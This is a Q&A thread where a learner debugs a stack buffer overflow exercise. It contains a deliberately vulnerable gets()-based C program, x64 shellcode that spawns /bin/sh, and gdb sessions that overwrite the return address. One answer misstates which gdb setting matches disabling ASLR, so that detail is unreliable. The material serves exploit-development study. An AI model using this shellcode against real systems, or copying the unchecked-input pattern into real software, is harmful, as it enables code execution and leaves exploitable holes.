# Buffer overflow success only when using gdb

Tags: shell, gdb, buffer-overflow, shellcode

If I modify return address directly with GDB, buffer overflow success and I can get shell. However when I don't use GDB, I can't get shell with same shell code. I can't find any difference between them.

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

int main(void)
{
    char str[256];
    char *ptr;
    int a;

    printf("문장을 입력하세요.\n");
    gets(str);
    printf("%s\n", str);
}
```

Above is my victim program 'ftz_level12'.

```
"\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
```

If I use gdb's set instruction, I can get shell like this

```
(gdb) r
Starting program: /home/knight/bof_prac/ftz_level12 
문장을 입력하세요.
hello

Breakpoint 1, 0x000000000040059c in main ()
(gdb) i r rbp
rbp            0x7fffffffe480   0x7fffffffe480
(gdb) set {int}0x7fffffffe488 = 0xffffeed0
(gdb) set {int}0x7fffffffe48c = 0x7fff
(gdb) disable
(gdb) c
Continuing.
hello
process 4443 is executing new program: /bin/dash
$
```

If I don't use set instruction I can't get shell

```
(gdb) r < code
Starting program: /home/knight/bof_prac/ftz_level12 < code
문장을 입력하세요.
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????abcdefgh?????
process 4449 is executing new program: /bin/dash
[Inferior 1 (process 4449) exited normally]
```

Above is shell code which I used.
I'm using ubuntu 16.04 and x64 architecture

Comment: You should read this http://stackoverflow.com/a/17775966/1585121

Comment: I read that link. I think it is really useful. But after reading it, I think it's little bit strange. Actually It doesn't run well on gdb too. If I designate return address with gdb's set instruction, I can get shell. If I don't use it than I can't get shell even if I use gdb.

Comment: What do you mean by "I can get shell"?

Comment: I'm not good at english. I added what ' I can get shell ' in question

Answer (score 0):

> I can't find any difference between them.

GDB by default disables address space randomization. You can re-enable it with `(gdb) set disable-randomization off`.

https://stackoverflow.com/a/17775333

**Update:**

> I shut down aslr protection by /proc/sys/kernel/randomize_va_space=0

That's pretty equivalent to setting `disable-randomization off` in GDB.

As the [other answer](https://stackoverflow.com/a/17775966) mentions, you also need to arrange the stack layout inside and outside of GDB to be close enough.

One difference that could be relevant is that GDB always invokes the program by its full path. Try running in outside GDB like so:

```
/home/knight/bof_prac/ftz_level12 < code
```

Comment: I shut down aslr protection by /proc/sys/kernel/randomize_va_space=0. I think set disable-randomization off is as same as /proc/sys/kernel/randomize_va_space. Did I misunderstand??

Comment: I tried /home/knight/bof_prac/ftz_level12 < code but It still print segment fault